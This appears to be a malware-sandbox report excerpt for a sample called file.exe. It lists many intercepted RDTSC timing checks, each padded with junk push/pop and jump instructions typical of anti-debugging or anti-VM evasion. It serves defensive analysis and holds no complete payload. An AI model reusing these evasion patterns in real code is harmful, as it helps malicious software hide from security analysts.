Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7294 second address: EE729E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4FB8FDD4F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE7393 second address: EE7399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE743A second address: EE7452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE76D6 second address: EE76EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62282h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6FF8 second address: EC6FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6FFC second address: EC7000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7000 second address: EC7010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F4FB8FDD4F6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7010 second address: EC7027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Dh 0x00000009 ja 00007F4FB8D62276h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7027 second address: EC7039 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F4FB8FDD4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7039 second address: EC703F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1A6DF second address: F1A6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4FB8FDD500h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AB0C second address: F1AB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AB16 second address: F1AB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD502h 0x00000007 jl 00007F4FB8FDD4F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4FB8FDD4FBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AB3F second address: F1AB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AC6D second address: F1AC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F4FB8FDD502h 0x0000000b jnl 00007F4FB8FDD4F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AC80 second address: F1AC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4FB8D62282h 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AC9A second address: F1ACAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AE11 second address: F1AE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FB8D62281h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1AE2D second address: F1AE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E975 second address: F1E984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 jnp 00007F4FB8D62276h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F22D63 second address: F22D6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FB8FDD4FEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2319E second address: F231A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F231A4 second address: F231A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23732 second address: F23741 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4FB8D62278h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F238AA second address: F238D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F4FB8FDD509h 0x0000000b jmp 00007F4FB8FDD503h 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F4FB8FDD4F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23A50 second address: F23A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23BD3 second address: F23BDF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FB8FDD4FEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23BDF second address: F23BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23BEC second address: F23BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E2A6 second address: F2E2CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62288h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8D6227Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E2CF second address: F2E2D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E2D4 second address: F2E2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4FB8D62276h 0x0000000a jo 00007F4FB8D62276h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DCAF second address: F2DCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DCB5 second address: F2DCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DFBD second address: F2DFC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F32DDE second address: F32DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F4FB8D6227Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F32DEC second address: F32DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4FB8FDD4FEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F32DF8 second address: F32E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3312E second address: F33132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33132 second address: F3314C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4FB8D62276h 0x00000008 jng 00007F4FB8D62276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F4FB8D62276h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3314C second address: F33156 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FB8FDD4F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33156 second address: F33173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FB8D62284h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33173 second address: F3317F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4FB8FDD4F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3AF5F second address: F3AF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62282h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3AF75 second address: F3AF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4FB8FDD4FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4FB8FDD4FAh 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3AF99 second address: F3AFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D6227Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3AFA9 second address: F3AFAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3AFAE second address: F3AFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B103 second address: F3B118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4FB8FDD4F6h 0x0000000a jno 00007F4FB8FDD4F6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B118 second address: F3B122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B122 second address: F3B12E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F4FB8FDD4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B27D second address: F3B2BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F4FB8D62276h 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4FB8D62283h 0x00000014 jno 00007F4FB8D62276h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 ja 00007F4FB8D62276h 0x00000027 pop eax 0x00000028 js 00007F4FB8D62282h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B2BB second address: F3B2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4FB8FDD4F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B2C9 second address: F3B2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3B2CF second address: F3B2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42A3C second address: F42A56 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FB8D62276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007F4FB8D6227Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42A56 second address: F42A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8FDD501h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42A6B second address: F42A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42A6F second address: F42A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BAF second address: F42BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BB3 second address: F42BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BB7 second address: F42BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BBD second address: F42BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F4FB8FDD4FDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BD3 second address: F42BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F42BD8 second address: F42BF6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4FB8FDD4F8h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 jo 00007F4FB8FDD4F6h 0x00000018 pop ebx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4344E second address: F43467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b jc 00007F4FB8D62282h 0x00000011 je 00007F4FB8D62276h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F43467 second address: F4346B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F437E1 second address: F437F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F437F3 second address: F437F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F43D70 second address: F43D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F43D74 second address: F43D9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4FB8FDD505h 0x0000000d jmp 00007F4FB8FDD4FBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F440A0 second address: F440A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F440A6 second address: F440BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jnl 00007F4FB8FDD4F8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F44627 second address: F44649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4FB8D62289h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F44649 second address: F44660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FB8FDD501h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F44660 second address: F44665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F44665 second address: F4466D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F48804 second address: F4880E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F47945 second address: F47949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F47ED1 second address: F47EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F47EDC second address: F47EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F481CD second address: F481D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F481D1 second address: F481D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4D241 second address: F4D24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4FB8D6227Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54F72 second address: F54F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F550F0 second address: F550FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F4FB8D62278h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55262 second address: F5526F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F4FB8FDD4F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5526F second address: F5527A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55392 second address: F5539B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5539B second address: F553A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4FB8D62276h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55613 second address: F55624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4FB8FDD4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55897 second address: F558A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FB8D6227Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54760 second address: F54769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54769 second address: F5476E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5476E second address: F5479B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F4FB8FDD503h 0x0000000d jne 00007F4FB8FDD4F6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5479B second address: F547B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DABD second address: F5DAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAC1 second address: F5DAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAC7 second address: F5DACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DACD second address: F5DAEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FB8D62288h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAEE second address: F5DAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAFA second address: F5DB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4FB8D62282h 0x0000000b popad 0x0000000c rdtsc
